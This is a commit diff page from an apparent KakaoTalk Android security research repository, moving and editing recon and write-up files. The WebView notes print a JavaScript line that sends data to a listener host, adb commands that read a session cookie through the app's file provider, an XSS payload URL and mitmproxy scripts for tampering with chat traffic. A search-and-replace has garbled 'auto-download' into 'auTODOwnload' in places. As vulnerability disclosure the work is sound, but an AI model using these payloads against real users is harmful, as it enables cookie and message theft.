gnh1201/kakaotalk_analysis
1
0
Fork 0
mirror of https://github.com/stulle123/kakaotalk_analysis.git synced 2025-05-07 12:06:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Finalize write-up

Browse Source
This commit is contained in:
stulle123 2023-12-26 17:09:47 +01:00
parent 3c9880d142
commit 99ff6f8727
11 changed files with 47 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
README.md
View File

@ -2,18 +2,19 @@
## Setup ## Setup
[My setup used to analyze the KakaoTalk Android app](SETUP.md). [My setup used to analyze the KakaoTalk Android app](./doc/SETUP.md).
## Recon ## Recon
- [General recon notes](RECON.md). - [General recon notes](./doc/RECON.md).
- [WebView recon](./recon/webview/WEBVIEW.md). - [WebView recon](./doc/WEBVIEW.md).
## Scripts
Frida and mitmproxy scripts are [here](./scripts/).
## Findings ## Findings
- [Steal another user's chat messages](ACCOUNT_TAKEOVER.md) - [Steal another user's chat messages](./doc/ACCOUNT_TAKEOVER.md)
- [Secret Chat findings](SECRET_CHAT.md) - [Secret Chat findings](./doc/SECRET_CHAT.md)
## Scripts
- Frida and mitmproxy scripts are in [here](./scripts/).
- [How to run the mitmproxy scripts](./scripts/mitmproxy/README.md)

0
ACCOUNT_TAKEOVER.md → doc/ACCOUNT_TAKEOVER.md
View File

18
RECON.md → doc/RECON.md
View File

@ -18,7 +18,7 @@
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`). > Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
> There are a lot of **TO-DO's** in this document where one can try to dig deeper. > There are a lot of **TODO's** in this document where one can try to dig deeper.
## General App Infos ## General App Infos
@ -86,7 +86,7 @@ zzng.xml
Some values (e.g., OAuth tokens) in the Shared Preferences are encrypted with a static key which is derived from a hard-coded passphrase (can be found in class `SimpleCipher`). Some values (e.g., OAuth tokens) in the Shared Preferences are encrypted with a static key which is derived from a hard-coded passphrase (can be found in class `SimpleCipher`).
**TO-DO**: Check Shared Prefs for sensitive information. **TODO**: Check Shared Prefs for sensitive information.
Trace Shared Prefs usage with this [Frida script](https://github.com/m0bilesecurity/Frida-Mobile-Scripts/blob/master/Android/shared_preferences_monitor.js). See [example trace](./recon/frida_trace_shared_prefs.log). Trace Shared Prefs usage with this [Frida script](https://github.com/m0bilesecurity/Frida-Mobile-Scripts/blob/master/Android/shared_preferences_monitor.js). See [example trace](./recon/frida_trace_shared_prefs.log).
@ -105,13 +105,13 @@ multi_profile_database.db
One can decrypt the contents of `KakaoTalk.db` and `KakaoTalk2.db` with this [script](https://github.com/jiru/kakaodecrypt). One can decrypt the contents of `KakaoTalk.db` and `KakaoTalk2.db` with this [script](https://github.com/jiru/kakaodecrypt).
**TO-DO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`. **TODO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
## Rest APIs ## Rest APIs
Most endpoints are HTTPS protected. Certs in the `assets/sdk` folder are used for certification pinning (see class `com.kakao.i.http.g.b`). Most endpoints are HTTPS protected. Certs in the `assets/sdk` folder are used for certification pinning (see class `com.kakao.i.http.g.b`).
Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TO-DO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs. Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TODO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
Interesting classes: Interesting classes:
``` ```
@ -138,19 +138,19 @@ Many many (exported) `BROWSABLE` Activities.
## Services ## Services
**TO-DO** **TODO**
## Content Providers ## Content Providers
**TO-DO** **TODO**
## Broadcast Receivers ## Broadcast Receivers
**TO-DO** **TODO**
## WebViews ## WebViews
See [here](./recon/webview/WEBVIEW.md). See [here](./WEBVIEW.md).
## Firebase ## Firebase
@ -193,7 +193,7 @@ $ curl "https://firebaseremoteconfig.googleapis.com/v1/projects/552367303137/nam
## Native Libs ## Native Libs
**TO-DO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`): **TODO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
```bash ```bash
libACExternalCore.so libc++_shared.so libopencv_java4.so libACExternalCore.so libc++_shared.so libopencv_java4.so

6
SECRET_CHAT.md → doc/SECRET_CHAT.md
View File

@ -41,12 +41,10 @@ Android implementation specifics:
- Receiver's public keys in table `public_key_info` of `KakaoTalk.db` database - Receiver's public keys in table `public_key_info` of `KakaoTalk.db` database
- Shared secret stored in table `secret_key_info` of `KakaoTalk.db` database - Shared secret stored in table `secret_key_info` of `KakaoTalk.db` database
TO-DOS: TODOS:
- Reinstall the app and check whether a warning shows up
- Test CFB bit flipping
- How are the msgId and chatId generated? -> nonce for CTR mode! - How are the msgId and chatId generated? -> nonce for CTR mode!
Demo: Demo:
![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/scripts/mitmproxy/secret_chat_demo.gif?raw=true) ![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/doc/secret_chat_demo.gif?raw=true)

2
SETUP.md → doc/SETUP.md
View File

@ -53,7 +53,7 @@ Install required tools:
- Get latest [jadx](https://nightly.link/skylot/jadx/workflows/build-artifacts/master) - Get latest [jadx](https://nightly.link/skylot/jadx/workflows/build-artifacts/master)
- Get [Burp Suite](https://portswigger.net/burp/communitydownload) - Get [Burp Suite](https://portswigger.net/burp/communitydownload)
- Get [KakaoTalk for Windows/MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en) - Get [KakaoTalk for MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
- `$ brew install apktool nuclei sqlite db-browser-for-sqlite` - `$ brew install apktool nuclei sqlite db-browser-for-sqlite`
- `$ pip3 install --upgrade frida-tools mitmproxy` - `$ pip3 install --upgrade frida-tools mitmproxy`

14
recon/webview/WEBVIEW.md → doc/WEBVIEW.md
View File

@ -1,7 +1,7 @@
# WebView Recon # WebView Recon
- [Low Severity Findings](#low-severity-findings) - [Low Severity Findings](#low-severity-findings)
- [To-Dos / Digging](#to-dos--digging) - [TODOs / Digging](#TODOs--digging)
- [Tokens / Cookies](#tokens--cookies) - [Tokens / Cookies](#tokens--cookies)
- [JavaScript Interfaces](#javascriptinterface) - [JavaScript Interfaces](#javascriptinterface)
- [Redirect Endpoints](#redirect-endpoints) - [Redirect Endpoints](#redirect-endpoints)
@ -20,7 +20,7 @@
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`). > Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
> There are a lot of **TO-DO's** in this document where one can try to dig deeper. > There are a lot of **TODO's** in this document where one can try to dig deeper.
## Low Severity Findings ## Low Severity Findings
@ -113,14 +113,14 @@ img.src = 'http://10.0.2.2:8888?data=' + encodeURIComponent(data);
- Reading a cookie: `adb shell content read --uri "content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627"` - Reading a cookie: `adb shell content read --uri "content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627"`
- Using the `android-app:` scheme: `adb shell am start "android-app://#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627\;end"` - Using the `android-app:` scheme: `adb shell am start "android-app://#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627\;end"`
- There are a couple of JavaScript interfaces that access the user's location (see [below](#javascriptinterface)) - There are a couple of JavaScript interfaces that access the user's location (see [below](#javascriptinterface))
- Auto-download to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`) - AuTODOwnload to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
- I can access other `BROWSABLE` Activities or Apps via the `android-app:` scheme, e.g.: - I can access other `BROWSABLE` Activities or Apps via the `android-app:` scheme, e.g.:
- `location.href = "android-app://com.google.android.googlequicksearchbox/https/www.google.com"` - `location.href = "android-app://com.google.android.googlequicksearchbox/https/www.google.com"`
- `setWebContentsDebuggingEnabled` is enabled for most WebViews - `setWebContentsDebuggingEnabled` is enabled for most WebViews
- XSS in `com.kakao.talk.activity.cscenter.CsCenterActivity` (search field) - XSS in `com.kakao.talk.activity.cscenter.CsCenterActivity` (search field)
- https://cs.kakao.com/search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E (you need to click into the search field to trigger the alert) - https://cs.kakao.com/search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E (you need to click into the search field to trigger the alert)
## To-Dos / Digging ## TODOs / Digging
Things to try out / dig deeper. Things to try out / dig deeper.
@ -241,17 +241,17 @@ Maybe someone finds a XSS here:
- `XMLHttpRequest` still won't work -> because it's not a `file://` URL? - `XMLHttpRequest` still won't work -> because it's not a `file://` URL?
- Need to be able to create/download files in/to `Download` folder - Need to be able to create/download files in/to `Download` folder
- Cannot steal files that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json`. - Cannot steal files that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json`.
- `CommerceShopperWebViewActivity` doesn't auto-download but also doesn't render binary files - `CommerceShopperWebViewActivity` doesn't auTODOwnload but also doesn't render binary files
### DownloadListener.onDownloadStart ### DownloadListener.onDownloadStart
- Check `p21.e` / `DownloaderTask` class (`com.kakao.talk.widget.webview.WebViewHelper` -> `processDownload()` -> `C42792b.m9697b()` -> `DownloaderTask.m16277b()`) - Check `p21.e` / `DownloaderTask` class (`com.kakao.talk.widget.webview.WebViewHelper` -> `processDownload()` -> `C42792b.m9697b()` -> `DownloaderTask.m16277b()`)
- **TO-DO**: Try path traversal - **TODO**: Try path traversal
- Bypass `DownloaderTask` checks - Bypass `DownloaderTask` checks
- Downloads files to `/sdcard/Download/` directory - Downloads files to `/sdcard/Download/` directory
- Not able to overwrite files - Not able to overwrite files
- Play with `data:` URIs (`data:[<mediatype>][;base64],<data>`) - Play with `data:` URIs (`data:[<mediatype>][;base64],<data>`)
- **TO-DO:** I *might* be able to force WebViews to auto-download files by pointing them to an attacker-controlled website. Required headers: - **TODO:** I *might* be able to force WebViews to auTODOwnload files by pointing them to an attacker-controlled website. Required headers:
- `Content-Type: application/octet-stream` - `Content-Type: application/octet-stream`
- `content-disposition: attachment; filename=foo.html` - `content-disposition: attachment; filename=foo.html`
- Investigate `com.kakao.talk.widget.webview.WebViewHelper` class: - Investigate `com.kakao.talk.widget.webview.WebViewHelper` class:

0
scripts/mitmproxy/secret_chat_demo.cast → doc/secret_chat_demo.cast
View File

0
scripts/mitmproxy/secret_chat_demo.gif → doc/secret_chat_demo.gif
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 1.3 MiB

After

Width:  |  Height:  |  Size: 1.3 MiB

0
scripts/mitmproxy/lib/ComputeKakaoNonce.java → scripts/misc/ComputeKakaoNonce.java
View File

27
scripts/mitmproxy/README.md
View File

@ -1,21 +1,31 @@
# MITM Kakaotalk LOCO Packets # mitmproxy Scripts
This is a simple script to man-in-the-middle LOCO packets with mitmproxy. There are four `mitmproxy` scripts in this directory to play with LOCO traffic:
Setup on your MITM host: - `flip_ciphertext_bits.py` -> a POC for showing the CFB malleability of encrypted LOCO packets
- `replace_loco_message.py` -> Replace a LOCO message with another one to show missing integrity protection
- `mitm_single_tls_host.py` -> MITM a single TLS host only. Passthrough all other TLS traffic.
- `mitm_secret_chat.py` -> MITM end-to-end encrypted *SECRET CHAT* messages
To run the scripts, do the following:
1. Start mitmproxy script on your MITM host and copy the WireGuard config:
```bash ```bash
$ python3 -m venv venv $ python3 -m venv venv
$ source venv/bin/activate $ source venv/bin/activate
(venv) $ python3 -m pip install mitmproxy bson cryptography (venv) $ python3 -m pip install mitmproxy bson cryptography
(venv) $ mitmdump --mode wireguard --rawtcp -s loco_mitm.py (venv) $ mitmdump --mode wireguard --rawtcp -s replace_loco_message.py
``` ```
Android emulator setup: 2. Android device/emulator setup:
- Install the Kakaotalk app if not done already - Install the Kakaotalk app if not done already
- Install the WireGuard app - Install the WireGuard app
- Change the IP address in mitmproxy's generated WireGuard config to `10.0.2.2`. Example: - Import mitmproxy's generated WireGuard config into the WireGuard app
If you run the Android Emulator on your MITM host, change the IP address to `10.0.2.2`. Example:
``` ```
[Interface] [Interface]
PrivateKey = MCCAFVMZQk+k+sbdXx0B4LG+Mij/UO7qyWa7IRqv/nA= PrivateKey = MCCAFVMZQk+k+sbdXx0B4LG+Mij/UO7qyWa7IRqv/nA=
@ -27,9 +37,8 @@ PublicKey = K+t/qiGO8tlA9L7wjAOb8wqjnu/NuthHgLs2gOCIDgY=
AllowedIPs = 0.0.0.0/0 AllowedIPs = 0.0.0.0/0
Endpoint = 10.0.2.2:51820 Endpoint = 10.0.2.2:51820
``` ```
- Import the config into the WireGuard app
Back on your MITM host start Frida (see [setup instructions](../../SETUP.md#setup-frida-to-disable-certificate-pinning)): 3. Start Frida on MITM host (see [setup instructions](../../doc/SETUP.md#setup-frida-to-disable-certificate-pinning))
```bash ```bash
# Start frida-server # Start frida-server
@ -39,7 +48,7 @@ $ adb root && adb shell /data/local/tmp/frida-server
$ frida -U -l loco-tracer.js -f com.kakao.talk $ frida -U -l loco-tracer.js -f com.kakao.talk
``` ```
To run the unit tests: Optional: To run the unit tests for `mitm_secret_chat.py`:
- Install `pytest` and `pytest-datadir` via pip - Install `pytest` and `pytest-datadir` via pip
- Run the tests: `$ pytest tests/test_loco_parser.py` - Run the tests: `$ pytest tests/test_loco_parser.py`

0
scripts/mitmproxy/inject_loco_message.py → scripts/mitmproxy/replace_loco_message.py
View File